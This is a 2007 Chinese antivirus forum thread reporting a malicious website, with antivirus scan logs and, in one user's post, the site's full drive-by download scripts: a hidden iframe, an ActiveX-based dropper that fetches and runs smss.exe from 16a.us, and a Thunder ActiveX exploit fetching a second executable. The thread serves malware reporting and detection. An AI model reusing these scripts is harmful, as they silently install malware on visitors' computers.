毒网

显示全部楼层 · 发表于 2007-5-31 21:50:16

http://www.zhaoxl.cn

显示全部楼层 · 发表于 2007-5-31 21:52:04

显示全部楼层 · 发表于 2007-5-31 21:52:43

这个老点
detected: virus Virus.Win32.AutoRun.p URL: http://bbs.kafan.cn/attachment.php?aid=79068//~Temp6014.exe//UPX

显示全部楼层 · 发表于 2007-5-31 21:53:37

Scan performed at: 2007-5-31 21:53:40
Scanning Log
NOD32 version 2301 (20070531) NT
Command line: C:\Documents and Settings\EQ2\桌面\~Temp6014.rar
Operating memory - is OK

Date: 31.5.2007 Time: 21:53:44
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\~Temp6014.rar
C:\Documents and Settings\EQ2\桌面\~Temp6014.rar ?RAR ?~Temp6014.exe - probably a variant of Win32/PSW.Delf.NHI trojan
Number of scanned files: 2
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 21:53:44 Total scanning time: 0 sec (00:00:00)

显示全部楼层 · 发表于 2007-5-31 21:54:10

info = "<script src="http://16a.us/oKK/JsT.js"></script>" +"\n"+
"<script>" +"\n"+
"function Start(){" +"\n"+
"var Then = new Date() " +"\n"+
"Then.setTime(Then.getTime() + 24*60*60*1000)" +"\n"+
"var cookieString = new String(document.cookie)" +"\n"+
"var cookieHeader = "Cookie1=" " +"\n"+
"var beginPosition = cookieString.indexOf(cookieHeader)" +"\n"+
"if (beginPosition != -1){ " +"\n"+
"} else " +"\n"+
"{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() " +"\n"+
"document.writeln("<iframe height=0 width=0 src=\\"http:\\/\\/16a.us\\/oKK\\/oKKT.asp\\"><\\/iframe>");" +"\n"+
"}" +"\n"+
"}" +"\n"+
"Start();" +"\n"+
"</script>"
document.write(info)

复制代码

是不是那个大黑名单?

document.writeln("<script>window.onerror=function(){return true;}<\/script>");
document.writeln("<script>");
document.writeln(" DZ=\'http://16a.us/oKK/smss.exe\';");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln("function GnMs(n) ");
document.writeln("{ ");
document.writeln(" var numberMs = Math.random()*n;");
document.writeln(" return \'~Temp\'+Math.round(numberMs)+\'.tmp\';");
document.writeln("} ");
document.writeln(" try ");
document.writeln("{");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln(" var Bf=document.createElement("object");");
document.writeln(" Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");");
document.writeln(" var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");");
document.writeln(" var AS=Bf.CreateObject("Adodb.Stream","");");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln(" AS.type=1;");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln(" Kx.open("GET", DZ,0);");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln(" Kx.send();");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln(" Ns1=GnMs(9999);");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln(" var cF=Bf.CreateObject("Scripting.FileSystemObject","");");
document.writeln(" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);");
document.writeln(" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");");
document.writeln(" ok1=cF.BuildPath(NsTmp+\'\\system32\',\'cmd.exe\');");
document.writeln(" q.SHeLLExecute(ok1,\' /c \'+Ns1,"","open",0);");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln("} ");
document.writeln(" catch(MsI) { MsI=1; }");
document.writeln(" adgsdflkjgpgfdpo=\'\';");
document.writeln("<\/script>")

复制代码

<script>window.onerror=function(){return true;}</script>
<SCRIPT>
var boH1 = null;
var OOwHUXqkg2 = 0;
function init()
{
try
{
boH1 = new ActiveXObject("ThunderServer.webThunder.1")
}
catch (e)
{
return 0
}
return 1
}
function downfile()
{
boH1["SetConfig"]("MessagePanel", "DownloadComplete", "0");
boH1["SetConfig"]("Sound", "DownloadComplete", "0");
boH1["ShowBrowserWindow"]();
var HwY_a3 = "http://16a.us/oKK/smss1.exe";
var V_WoijZC4 = "Temp.exe";
var TiVPJ5 = "c:\";
var SRVntkDAp6 = "";
var dkisBy7 = "";
var zb8 = 1;
var asnF9 = 0;
var sXpsYU10 = 5;
var pYoldJ11 = 0;
var ZPuTA12 = "";
var csASX13 = "";
var gkCsZrTn14 = "";
var PPkhBib15 = "";
var SGluFdn16 = 0;
var gIuWnHbni17 = "";
var qKs18 = boH1["AddTask"](HwY_a3, V_WoijZC4, TiVPJ5, SRVntkDAp6,
dkisBy7, zb8, asnF9, sXpsYU10,
pYoldJ11, ZPuTA12, csASX13, gkCsZrTn14,
PPkhBib15, SGluFdn16, gIuWnHbni17);
boH1["HideBrowserWindow"](1);
var _Y$TngwO22 = new window["Number"]();
var j23 = new window["String"]();
var jZPeXTI24 = new window["String"]();
if (qKs18["length"] > 0)
{
jZPeXTI24 = qKs18["split"]("{\r*\r}");
_Y$TngwO22 = window["parseInt"](jZPeXTI24[0]);
j23 = jZPeXTI24[1]
}
else
{
return 1
}
if (_Y$TngwO22 == 1)
return 1;
return j23
}
function open()
{
boH1["OpenFile"](OOwHUXqkg2);
boH1["DeleteTask"](OOwHUXqkg2, true);
}
function exec()
{
var cbEKfbd25 = init();
if (cbEKfbd25 == 0)
return;
OOwHUXqkg2 = downfile();
var aTzE26;
for (aTzE26 = 0; OOwHUXqkg2 == 1 && aTzE26 < 50; aTzE26++)
OOwHUXqkg2 = downfile();
if (OOwHUXqkg2 == 1)
return;
window["setTimeout"]("open()", 6000);
boH1["DeleteTask"](OOwHUXqkg2, del);
}
exec();
</SCRIPT>

复制代码

[ 本帖最后由 icka 于 2007-5-31 22:00 编辑 ]

显示全部楼层 · 发表于 2007-5-31 21:55:36

Virus: Virus.Win32.AutoRun.p

Virus found while downloading Web content.

Address: bbs.kafan.cn

显示全部楼层 · 发表于 2007-5-31 22:12:46

进入网站无反应。费尔扫描不报。

显示全部楼层 · 发表于 2007-5-31 22:56:04

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\~Temp6014.rar'
C:\Documents and Settings\morgan\My Documents\
  ~Temp6014.rar
[0] Archive type: RAR
--> ~Temp6014.exe
      [DETECTION] Contains signature of the dropper DR/Delphi.Gen
      [WARNING] Infected files in archives cannot be repaired!
      [INFO]    The file was deleted!

显示全部楼层 · 发表于 2007-5-31 23:05:09

原帖由 icka 于 2007-5-31 21:54 发表
info =             ""       +"\n"+
            ""       +"\n"+
            "function Start(){"       +"\n"+
            "var Then = new Date() "       +"\n"+
            ...

好久不见啊

显示全部楼层 · 发表于 2007-5-31 23:31:46

原帖由 1p1 于 2007-5-31 23:05 发表

好久不见啊

一直潜水~~

[病毒样本] 毒网

本帖子中包含更多资源

本帖子中包含更多资源